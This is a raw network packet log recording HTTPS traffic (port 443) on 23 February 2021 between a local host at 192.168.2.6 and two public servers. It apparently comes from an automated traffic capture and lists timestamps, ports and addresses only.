Feb 23, 2021 16:02:20.469914913 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469930887 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469950914 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469969034 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469986916 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470002890 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470020056 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470035076 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470052004 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470071077 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470093966 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470103025 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.470115900 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470134974 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470164061 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470171928 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470187902 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.470190048 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470207930 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470225096 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470241070 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470262051 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.470263004 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.470355988 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.482769966 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.483041048 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.530642033 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.610914946 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.611141920 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.622719049 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622750998 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622769117 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622788906 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622812986 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622829914 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622845888 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622863054 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622879028 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622895956 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622911930 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622931957 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622951031 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622951031 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.622967958 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.622984886 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623003006 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623018026 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623034954 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623050928 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623070955 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623090029 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623106003 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623121977 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623138905 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623153925 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623155117 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623172045 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623173952 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623183012 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623187065 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623188972 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623189926 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623193026 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623208046 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623220921 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623225927 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623243093 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623254061 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623259068 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623275995 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623279095 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623291016 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623307943 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623315096 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623325109 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623334885 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623344898 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623363972 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623374939 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623379946 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623397112 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623413086 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623420000 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623429060 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623447895 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623450041 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623464108 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623477936 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623483896 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.623507023 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.623534918 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.655643940 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.770235062 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.770275116 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.770323992 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.770351887 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.117007971 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.122526884 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.157694101 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.157968044 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.163285971 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.163705111 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.272938013 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.313571930 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315299988 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315359116 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315383911 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315398932 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315414906 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.315478086 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.315557957 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.347265959 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.364253998 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.364873886 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.365209103 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.387950897 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.388955116 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.388998985 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.389024019 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.389040947 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.389056921 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.389142036 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.389178038 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.405627012 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.405663967 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.405848980 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.407522917 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.407720089 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.411962032 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.414432049 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.414531946 CET	49745	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.423748016 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.424352884 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.424422979 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.431152105 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.464757919 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.464792013 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.464951992 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.464957952 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.465004921 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.466101885 CET	49744	443	192.168.2.6	152.199.23.37
Feb 23, 2021 16:02:21.496367931 CET	443	49745	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.550431013 CET	443	49744	152.199.23.37	192.168.2.6
Feb 23, 2021 16:02:21.561065912 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564583063 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564621925 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564646959 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564671040 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564682007 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.564692020 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564716101 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564735889 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.564738035 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564760923 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564784050 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564788103 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.564804077 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564815998 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.564822912 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.564858913 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.564903975 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.565596104 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565634012 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565659046 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565680981 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565700054 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.565702915 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565730095 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565754890 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565758944 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.565777063 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565800905 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565802097 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.565819979 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565829992 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.565835953 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.565875053 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.576205015 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576250076 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576270103 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576294899 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576318979 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576339960 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576359987 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576380968 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576397896 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.576400042 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576417923 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576433897 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.576467037 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.576498985 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.584258080 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584300995 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584321022 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584342003 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584362030 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584383965 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584403992 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584424019 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584423065 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.584449053 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584470987 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584486961 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:21.584491968 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.584522963 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:21.584551096 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.368330956 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.369173050 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.370845079 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.370940924 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.514976025 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.515105009 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.515769958 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.516021967 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.518616915 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.518661976 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.518733978 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.518790007 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.536899090 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.537264109 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.537539959 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.537745953 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.684813976 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684851885 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684869051 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684892893 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684900999 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684912920 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.684931040 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685041904 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685112953 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685235977 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685265064 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685278893 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685317039 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685340881 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685600042 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685631037 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685645103 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.685679913 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.685729980 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.690102100 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.690505981 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.690712929 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.690804005 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.690901041 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.691318989 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.691869020 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.692316055 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.697402000 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.697804928 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.697823048 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.698411942 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.836930037 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.837117910 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.837671995 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.838187933 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.838291883 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.838387966 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.838449955 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.838749886 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.839407921 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.840200901 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.840301991 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.840394020 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.840452909 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.841130018 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843319893 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843343019 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843360901 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843374014 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843388081 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843403101 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843446970 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843465090 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843467951 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843481064 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843497992 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843513012 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843525887 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843542099 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843547106 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843581915 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843596935 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.843625069 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.843656063 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.844183922 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.844711065 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.846134901 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.846149921 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.846220016 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.846276045 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.846278906 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.846316099 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.846342087 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.847096920 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.847198009 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.986769915 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.987010002 CET	49751	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.989980936 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990006924 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990025043 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990042925 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990061045 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990082026 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990101099 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990118980 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990135908 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990154028 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990170956 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990187883 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990205050 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990225077 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990242958 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990258932 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990276098 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990277052 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.990293026 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990309954 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990326881 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990343094 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990361929 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990370989 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.990381956 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.990420103 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.990446091 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.992631912 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.992650986 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:39.992821932 CET	49753	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:39.992885113 CET	49750	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:40.032821894 CET	443	49751	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.048460007 CET	443	49750	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.048492908 CET	443	49753	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.138127089 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.138173103 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.138200045 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.138219118 CET	443	49752	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:40.138225079 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:40.138252974 CET	49752	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:40.138284922 CET	49752	443	192.168.2.6	204.93.216.87
